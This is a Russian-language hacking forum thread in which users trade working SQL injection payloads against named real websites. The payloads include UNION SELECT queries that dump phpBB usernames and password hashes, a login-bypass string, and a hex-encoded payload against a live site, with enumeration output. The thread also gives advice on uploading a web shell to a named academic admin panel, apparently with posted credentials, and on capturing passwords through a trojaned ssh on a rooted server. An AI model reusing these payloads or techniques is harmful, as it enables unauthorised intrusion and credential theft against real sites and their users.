phpbb 3.0.0 MySQL 4.0.27 blind inj Code: ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*- Результат показывает. Code: ?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*- Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти?
1. В один из- параметров подставь cout(*) и посмотри сколько возможно вывести записей при данном запросе. 2. Конвентируй в HEX, а не в CHAR. 3. Попробуй вывести без WHERE через LIMIT ИЛИ LIKE. P.S. Не получиться, ссылку в ПМ.
В поле авторизации пишу hi' or 1=1-- на сайте http://*******.tv/login.php И выводит You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hi' or 1=1--' LIMIT 1)' at line 4. Тоесть скуля Как такую крутить?)
а что непонятного? MySQL server version for the right syntax to use near 'hi' or 1=1--' LIMIT 1)' //для тех кому не понятно, то как бы закрыть надо её
Вопрос такого типа, как можно перехватить пороль(узнать) имея доступ на систему (root) FreeBSD 6.3, знаю есть хеш, но он не побираеться. уже 2 недели;( читал про затроянивания ssh, но он делает только доступ. Какие есть идет по перехвату пороля узера?
подскажите как сода залить шелл http://ptb.ib-pan.krakow.pl/admin/index.php [email protected] p162002b плз
создай (где нить в новостях) html форму аплоада и пробуй через /admin/upLoad.php или залей на http://ptb.ib-pan.krakow.pl/files/ .htaccess и пробуй другие расширение...
функция mysql_connect Наверно наивный вопрос, но все же... Скрипт принимает данные и сразу же передает их функции mysql_connect(). По результатам ее работы устанавливается флаг об успешной или неуспешной авторизации. Можно ли в эту функцию что-то такое пихнуть (хотя бы теоретически), чтобы mysql_connect() вернула true? В 2006 году был сплоит по переполнению буфера в этой функции, но тут он не подходит.
вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12 выводимые поля не могу оприделить, допустим если в каждое поле вставить version() то сайт отоброжается, если поставить в 4 поле то выдает ошибку, как я понимаю там тока числовые значения проходят, подскажите ка дабить эту скуль если можно через четвертую колонку, а еще лудше где мануал по такому роду уязвимости почитать можно...
Раскрутил как BLIND! database(): awah @@tmpdir: /tmp version(): 5.1.53-log @@version_compile_os: pc-linux-gnu user(): [email protected] @@basedir: /data/mysql/zehnder/ @@datadir: /dh/mysql/ze_nder/data/
Code: http://artwithaheart.us/pages.php?pid=5%20and%201=2+union+select+1,2,3,%280x3120616e6420313d3220756e696f6e2073656c65637420312c322c332c76657273696f6e2829202d2d2031%29,5,6,7,8,9,10,11,12 P.S. ну тебя же должно было смутить, что если ты пишешь в 4ое поле не число и тебе выдаёт ошибку mysql_fetch_array() то значит что этот параметр используется где-то ещё (для общего развития)